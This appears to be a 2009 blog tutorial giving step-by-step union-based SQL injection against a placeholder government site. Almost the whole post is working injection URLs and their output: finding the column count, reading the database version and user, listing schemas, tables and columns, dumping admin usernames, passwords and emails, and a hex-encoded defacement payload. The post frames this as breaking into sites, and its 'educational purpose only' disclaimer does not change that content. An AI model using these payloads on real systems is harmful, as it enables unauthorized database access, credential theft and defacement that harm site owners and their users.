Dec 17, 2009

Step By step Sql Injection

This paper is the advance of my first article. In this tutorial, we will try how to enter to the website deeper than normaly using SQL Injection.1. The target is http://www.victim.gov/agent_detail.php?aid=9 We check the the site, is this site have bug. We only need to add single quote in last url. So the url be: http://www.victim.gov/agent_detail.php?aid=9' And error is appear. 2. We check number of column of that site. To check number of column, we user "order by". Dont forget to add (-) after = and (--) at last URl UR: http://www.victim.gov/agent_detail.php?aid=-9 order by 1--         //no error appear http://www.victim.gov/agent_detail.php?aid=-9 order by 2--         //no error appear http://www.victim.gov/agent_detail.php?aid=-9 order by 3--         //no error appear http://www.victim.gov/agent_detail.php?aid=-9 order by 4--         //no error appear http://www.victim.gov/agent_detail.php?aid=-9 order by 5--         //no error appear http://www.victim.gov/agent_detail.php?aid=-9 order by 6--         //error appear because in "order by 6" error was apper so number of column is 5. The formula is n-1, which n is number of order by when error appear. 3. We check the number that can be exploitable. We use "union all select" UR: http://www.victim.gov/agent_detail.php?aid=-9 union all select number_of_column!-- so: http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,3,4,5-- The 1,2,3,4,5 is from number_colum, if the number_of_column is 3, so the query will be "union all select 1,2,3". Number 3 appear. So 3 is exploitable number. 4. We check the version of that site. We use "version()" . We only need to replace the exploitable number with version(). URL: http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,version(),4,5-- and appear: 5.0.45-community-nt . We are luckly. We will able to know the name of database, table, and column. 5. We check the user of that site. We use "user()" . We only need to replace the exploitable number with user(). URL: http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,user(),4,5-- and appear: root@localhost. so the username is root. 6. We check the default database. We use "database()" . We only need to replace the exploitable number with database()(). URL: http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,database(),4,5-- and appear: "news" so the default database of that site is "news". 7. We check all of database in that site. We use "concat(schema_name) from information_schema.schemata" We need to replace exploitable with "concat(schema_name)" and we must add "from information_schema.schemata" in the last url. So the URl: http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(schema_name),4,5 from information_schema.schemata-- You will see all of database in that site. Example: news information_schema mysql cms connection shop etc 8. We check the name of table of that site (default database). This is query if you want see the table name of default database. We use "concat(table_name) from information_schema.tables where table_schema=database()" We need to replace exploitable with "concat(table_name)" and we must add "from information_schema.tables where table_schema=database()" in the last url. So the URl: http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=database()-- You will see table name of that database. Example: admin config news etc 9. We check the name of the table (default database). We use "concat(column_name) from information_schema.columns where table_name=0x[hexa]" [hexa] is the result of convertation is we convert text to hex. Example the hex of "cms" is 636D73 and hex of "admin" is 61646D696E     . Example the table is "admin", so the URL will be: http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E-- And you see the name of column in that table. Example: username password email etc 10. Dump the data (default database). We use "concat(column_name_1,0x3a,column_name_2,0x3a,column_name_n) from table_name" 3a is the result if we convert ":" to hex, it will separate each dumped data. Example we want to dump data in table admin, column username,password,email  . URL: http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(username,0x3a,password,0x3a,email),4,5 from admin-- And you see: admin:becareful:becareful@yahoo.co.uk the strusture: admin   --> username :      --> 0x3a becareful   --> password :      --> 0x3a becareful@yahoo.co.uk   --> email We have learn how to dump from default database. So how about other database? 11. Check table_name of other database. Example the other database is "cms" We use "concat(table_name) from information_schema.tables where table_schema=0x[hex]"  [hex] is the result when the convert name f the database to hex. The resulf if we convert "cms" to hex is 636D73. So the URL: http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(table_name),4,5 from information_schema.tables where table_schema=0x636D73-- And you see: cms cms_order cms_user 12. Check column_name of following tables Example the table is "cms_order" We use "concat(column_name) from information_schema.columns where table_schema=0x[hex] and table_name=0x[hex]" hex of "cms_order" is 636D735F6F72646572. So URL: http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(column_name),4,5 from information_schema.columns where table_schema=0x636D73 and table_name=0x636D735F6F72646572-- You will see: order_id order_reff 13. Dump data from following column. Example the column_nane are order_id,order_reff We use "concat(column_name,0x3a_column_name2) from database.table" So the URL: http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,concat(order_id,0x3aorder_reff),4,5 from cms.cms_order-- You will se the data :-) :-) :-) :-) 14. Fake deface using SQL injection We only need convert html to hex. example: xyberbreaker hex: 0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E After that, replace exploitable number with it. So the URL: http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,0x3C6D6172717565653E7879626572627265616B65723C2F6D6172717565653E,4,5-- You will see something good :-D The end. ///////////////////////////////////////////////////////////////////////////////////////// THIS IS FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE OF ANYTHING READER DO. "bagi yang menggunakan untuk kejahatan, dosa ditanggung sendiri". http://xyber-breaker.blogspot.com

No comments: